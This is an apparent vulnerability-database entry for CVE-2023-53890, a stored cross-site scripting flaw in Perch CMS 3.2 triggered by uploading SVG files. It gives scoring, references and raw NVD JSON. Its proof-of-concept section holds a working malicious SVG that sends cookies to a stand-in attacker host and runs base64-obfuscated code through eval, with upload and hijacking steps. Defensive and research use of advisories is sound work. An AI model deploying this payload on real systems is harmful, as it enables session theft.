CVE-2023-53890

Description

Perch CMS 3.2 contains a stored cross-site scripting vulnerability that allows authenticated users to upload malicious SVG files with embedded JavaScript. Attackers can craft SVG files with script tags that execute when the file is viewed, potentially stealing user session information or performing client-side attacks.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:grabaperch:perch:3.2:*:*:*:*:*:*:* - VULNERABLE

Perch CMS < 3.2

Perch CMS 3.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- 恶意SVG文件 POC for CVE-2023-53890 -->
<!-- 上传此文件到Perch CMS文件管理器 -->
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="300" height="200">
  <script type="text/javascript">
    // 窃取Cookie并发送到攻击者服务器
    var stolen_data = 'cookie=' + encodeURIComponent(document.cookie) + '&url=' + encodeURIComponent(window.location.href);
    var img = new Image();
    img.src = 'https://attacker.com/collect?' + stolen_data;
    
    // 可选：显示弹窗（演示用）
    alert('XSS Exploited - CVE-2023-53890\nCookie: ' + document.cookie);
  </script>
  
  <!-- 使用onload事件作为备选触发方式 -->
  <rect width="300" height="200" fill="#ff0000" onload="eval(atob('YWxlcnQoIkRhdGEgU3RlYWxlbiIpOw=='))"/>
  
  <text x="10" y="100" font-size="20" fill="white">Malicious SVG - CVE-2023-53890</text>
</svg>

<!-- 攻击步骤说明：
1. 创建一个包含恶意JavaScript的SVG文件
2. 使用有效账户登录Perch CMS 3.2
3. 导航到文件上传功能
4. 上传此SVG文件
5. 当管理员或用户查看该文件时，脚本将自动执行
6. 攻击者收集窃取的Cookie进行会话劫持
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53890
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53890
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53890/
[4] VulDB https://vuldb.com/cve/CVE-2023-53890
[5] https://grabaperch.com/
[6] https://www.exploit-db.com/exploits/51621
[7] https://www.vulncheck.com/advisories/perch-cms-stored-cross-site-scripting-via-svg-file-upload
[8] https://www.exploit-db.com/exploits/51621

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53890", "sourceIdentifier": "[email protected]", "published": "2025-12-15T21:15:52.247", "lastModified": "2026-01-23T02:36:38.923", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Perch CMS 3.2 contains a stored cross-site scripting vulnerability that allows authenticated users to upload malicious SVG files with embedded JavaScript. Attackers can craft SVG files with script tags that execute when the file is viewed, potentially stealing user session information or performing client-side attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:grabaperch:perch:3.2:*:*:*:*:*:*:*", "matchCriteriaId": "914354F9-2440-4FC0-BECC-C3A08FFDB6EF"}]}]}], "references": [{"url": "https://grabaperch.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51621", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/perch-cms-stored-cross-site-scripting-via-svg-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51621", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}